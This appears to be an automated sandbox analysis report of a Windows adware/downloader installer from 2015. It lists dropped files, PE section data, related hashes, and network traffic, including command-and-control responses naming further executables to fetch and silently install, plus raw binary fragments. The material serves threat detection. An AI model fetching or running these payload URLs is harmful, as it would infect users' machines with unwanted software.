%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (17497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (5397 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United Kingdom)
Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United Kingdom)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 8052736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 8200192 | 17160 | 17408 | 4.10925 | 8c98f8e8949701fab7362cf5fee6aa77 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 111
a5330d468717116f74e3f10c4af44ac9
690ebba27ca644cb1b3d6388e7c7e729
efff4790e2230374a1955cff468937a7
a35700f8e5b2070b6319cc73b9d15e8c
a6888dbbce87de027b829ad327f9ec41
e28956a29319d03677d8afda35b2dcb5
0f07dccc9285915f7d3c73653e6bf0ee
fd2d68886a362660e43d25b7a5728b4b
fac0ca31ccab41d606a566383c5718a6
fa6098414e1c579522cd23af82b55ee7
e3cb8fc631421f66fe1f51130f584a60
e3aaebe60a907d83ac063b09d80c2d2a
cba8692b7091344f7b8a78a29ad1ad68
7725c07f38de7ed269eabf17e7325fe5
760503d49fb75d7904e558bbe41d6e6e
120d1491439d34fd1bccfb514360679e
efa8c2d5fff798ed23aa7498104e40a4
99686e4d7b7ff9b723d7a257648d59c3
8cf32881712b28915f2ac7165ca311b9
88cae34636cfe1a5acb657791c174008
7e036a5531a1895c4d1dbbe00cc0096e
75870f753f9ca4040ec5641a9f8415bd
7223be607a68097f8e0cd4950d2423de
4264200cc607faa0e4cc68fde00fb3e9
021f482a02d88886d31ef29849d5e6d0
cefe2cc50ed2bb29802c376ec1b7eb1c
Network Activity
URLs
URL | IP |
---|---|
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.16 |
hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 216.137.59.12 |
hxxp://download-servers.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://cds.c5z6s5a3.hwcdn.net/crcb/123/installer.exe | |
hxxp://ipgeoapi.com/ | 54.235.114.210 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 216.137.59.83 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.005 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.002 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 | |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://p-rumo00.kxcdn.com/Cdn.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://download-servers.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.16 |
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.243.78.255 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 | |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 | 54.231.15.52 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 | 54.231.15.52 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 | 54.231.13.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 | 54.231.15.52 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 | 54.231.15.52 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.005 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 | 54.231.15.52 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.003 | 69.16.175.42 |
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.6 |
hxxp://cdn-14b7.kxcdn.com/Cdn.exe | 194.63.141.18 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 | 54.231.15.52 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 | 69.16.175.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.004 | 69.16.175.42 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 | 54.231.15.52 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.002 | 69.16.175.42 |
hxxp://www.downloadsoup.com/thankyou.php | 54.225.142.102 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.001 | 69.16.175.42 |
hxxp://dl.randkeygen.com/crcb/123/installer.exe | 69.16.175.42 |
d24u51ac8ybaqu.cloudfront.net | 216.137.59.61 |
s3.amazonaws.com | 54.231.48.51 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/106/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72684
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop014.fr7.t,1446793110.cds062.fr7.c
..4Ll.....a......|a../...y.R1.bR. ..Rv.u'.c..o.....{.......5NkM.0.....y./..4.....(.Uw.m3......}....@z.....7..2.c.wv..Q...o.y9.L..1.lBn.PFt_.5..(.........Ll..].n].E$.....,.../.....DF.<.[ B...Z...#Z..WWd...$..k....>*...o)&.5.>.......b..2........#.U.ui.........[.P.s.?...-.....C....A..fv...Z.:..H<........A...>Y..}..RJ.....dO...*].@4..U..?$..<.j.DF......4...j.?b~m...l..R"...,x.4.....[A..V.Nj.......t..@..G.......I.K..2U.............r.k..5Xn%..W.4...L.(.....f..h.Z.S.m;..9.....#.....o....r....Y.&..r..hU..e..P......6...`..-g.... ..tL..We`r...1.|..l....P$.GQ.!R.......C~.v........ ..H....a6.....B.....{.....=...\P?...}.i..]m....?F..3|T.QE..Sq.U.rz<u..t..... ..@..,...$D.\P..m.B..ePhy.f.V.......M..XI.k3.g.......gP....(..&~N..ik\..<.......!U..g..3.....^t...@.$..F....2.....t.?...........]....r......~...2,P........"..g.8...L.K....J6CP/.|..d=.`.....UsOP.Bl(nilW.......[<..,.......l........5....p,w8t.....L9;.U....K/6.P............J....o#L~.@.....x..G..N.Wf.N...><4o.ha...].v.......P....f.c......$l..j........I....y...Iw....S.vwW.3..c.......E...(..S$l...su{P:"XW..<.-.OU$6....YD.L4..p.9......W;....h.e..r<.p..I..=.......&......9..&..}.#.......sX;u.)...Es/a.....:.J.L.L...T"..E..O...[hzg.s..eT...9..(....7.SL......V.;....a80....Mdd-..'/....j......p'u.............z.-#:..q..<...h..`.........0..|.U.GG.0.f.c.....m.D....~T..m..(...zv..$..s..c......{..........)....z....:..H...)...B.j.L..J........U.j..Q..K:.....u-z..`.F3O...U..v.....p...........K`.........I..Anw..d..Hq.......vah..5A......|....t.Iy.BI....
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 54771
Connection: keep-alive
Date: Thu, 05 Nov 2015 20:50:36 GMT
Last-Modified: Thu, 05 Nov 2015 15:37:34 GMT
ETag: "798e76757d49d72f41b8eebe1e77a852"
Accept-Ranges: bytes
Server: AmazonS3
Age: 36476
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0MOc63dPygCjoFtEKtUWSxsVzbZJyqNOj52rKmKEyeYqC2Q8_vAqig==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata... ...............................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.24
4ac..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-imi-tot-mdh-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe.. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=_V9/ylls..hXXp://dl.randkeygen.com/crcb/123/installer.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..http://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://cdn-14b7.kxcdn.com/Cdn.exe.. ..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483.. ..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542.. ..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://get.file167desktop.info/DownloadManager/Get?p=16434&d=30338&l=29565&n=1&productname=DownloadManager&exeurl=hXXp://download-servers.com/SysInfo/VOStub.exe&dynamicname=Updates&filename=EpLWWQ..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 06 Nov 2015 06:58:25 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.24..4ac..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-imi-tot-mdh-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..http
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:26 GMT
Content-Type: application/octet-stream
Content-Length: 125154
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=bseLbpD9T.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /crcb/123/installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.randkeygen.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:27 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440089314"
Last-Modified: Thu, 20 Aug 2015 16:48:34 GMT
Cache-Control: max-age=721
Content-Length: 1965128
Content-Type: application/x-msdownload
X-HW: 1446793107.dop008.fr7.t,1446793107.cds054.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............>.........q.............e...............b.......K.......r.........X.............:.......v.......?.....Rich....................PE..L......U.....................~....................@..........................p............@.......................................... ...A..............H....p..........8...........................h...@............................................text...T........................... ..`.rdata..z...........................@..@.data....0..........................@....rsrc....A... ...B..................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=79597
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793111.cds070.fr7.c
PK.........A.F....5.G.5.G.....chrome.packed.7z7z..'...X=.A..G.............4Q.J......8%D.i..."...8Z.z ..M.l.S.3...%......a...CE....JS,...o9..?.K.,.H......55G.....4....&.57c.Cc.b..(..r..dg...}.I.:l...M...s...L.....I.[... .h...S....Q.T...P%.G3....J.....-?........~97........~.$.BE..%....!..^9X........>....P....k......M3....W.W..r ..4..Jf.d*L_.l..V5Z..m......w..u....r.\.O.D...3T...[".E....A.ME?j....o......&t.7.v........G".....)k.y.V0...^)..1C7...b..n...W1.k.3a....G...........C.[....W....@t..X.lOU...hL..lT.)...`.;1.8}.2|.P..Z....!hn..I..u....R...l.=.....).i.H....K.p...5y.a`..S].$./...i.Y...X........lC 6..b..T..D|....X <v........rny).4.>...c..zE..h...>....,.,...Q..X...dW,.& G>.../..b.c...e...sOn..t..gX.v.. ...4S4]x'.h..E..-.c.|.....C.w..g..h...`9`c.......:..7.......!...Q.9Q\..h...@.(...g.C.!...TC.5.>t...?(|I..@B'z H%^..J...JDB.T/.&K1.9..f. .\......[...8fg%l/.l"..|.(..h}.M.t.5.Q......`\.B..Dg..,skG...5.....i.r.7O..C....M...!......P.D.a.i...zH.}....../......" .i...Z.b..i..,..V..L.....G..(.j..T.:3{7...k\..`.=.&.QC.)...5&...k..........\...L..ps,.".;........lt......)...zB.....]W/.H(` 0....v...j.....~...p..........V.O.Tt{..GbMH.g...!......V....Q..s<......SA.Rna.>...I..|.....PT..E$...9^'UI..I.y6.v ... .D.T.)..3=(z.u.:L...B..<.q..'i...X.{..........B.."k...@.I...C.e)..}.....Q......Q...m.!...b1.qf.7.P<.....G....m...........a..Y..T>.............W....su..J..U..9!...M..G...(.Z....;Yy....H......j.....cR..........Z%........%..&Z.i.y...@">...;..b..DYJ.1...]JZ.A..,-.m..qI.......X9.....@..@....$.o...
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72682
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop014.fr7.t,1446793111.cds054.fr7.c
B8.s.S^.....r...3.....R$.-..c$..D.^..k*;.....s.lF.@...pr|.e ..}.A.c.-g.....vU...zY x.O$....8.......)V..s I_.I.YT$.,.%%".D..W.u~=.....N&W.3\....knG5..|osy..bJ...~...(.T........u.ca..aq..Kh\RN7sk......P.s*:m...0u.g[...[h.....<b..sSa..4.eB.l..-..5...5..2.:j.A..y.....6.~".0,.../ p.....R..8.....!.......R..Z_q..o@..y........7.sn..o..........._..](.1...C.c6..P..p.DCR.V...lh...d.......&.1.....Y.RP....g.P.c..&.........d.....p.......>d.......j..&..0.X.U....>L...r.N..I.I.....W.m..x..C.a.c._.u{9.3.......L..lV..1.&...u......rw(.ud._d.R..........x..~.6...f'..L=....r...t.@........D...wB..5.....JR. fy.R.12.H.wg.mo...B...L..<.Eo.m.d.'.-^....z..;...#....T]..2.>...@.m.T,....0.<.~e.._..'H..u...F..x..........w....?..S...yV.....$}.1..oI.....L..../...........K%y ....'x M...9.Ae(.D.yOD.I.s..........P..i..."|...!...#.]....A.p..s.o.c..".....R6.....<X.r...8.P.....'../uN.qJ....>...P...,.A...."...w".@.h.j..1...6O.u'..G...wE.-z.p...w....S...&M*.q...........J.)8...i.6}..F..*HC.,Xc..l..F..8 /..O.~..r......8 ...\X.d}..........H!...x!..j....h{R....tV.g......f........on^RN..V..(.V.......K.V.\..`b..GP....A...T...w6.../~....7.Q.7.........-S.T8.t.q....C.1.?....3...NF....!01..J.*....h.r..t...9..f..R.o....v.....Jp...Fw...x.../..@vk...et... I\q&F.[-.........4..KP...e....fd-..K.$..L4.(...M........h..d..l..Q.^.E....&s5.. p.h...po...g...b......j:...o*..),.>.NB..I....'.......K...<.}.`8q.1!u~.....WY.....|.&..04.t...c..-S.y........4w........RY.(.#3i.'.n]q[..D..2.C..b.J...m ..rCX V.?;.h.4.C.6....S.AL...ac..U......./Tu.f..D....y.
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:29 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 06 Nov 2015 06:58:29 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /Cdn.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn-14b7.kxcdn.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: keycdn-engine
Date: Fri, 06 Nov 2015 06:58:46 GMT
Content-Type: application/octet-stream
Content-Length: 1011912
Connection: keep-alive
Last-Modified: Tue, 03 Nov 2015 17:14:18 GMT
ETag: "5638eb6a-f70c8"
Expires: Fri, 13 Nov 2015 06:58:46 GMT
Cache-Control: max-age=604800
X-Edge-Location: rumo
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
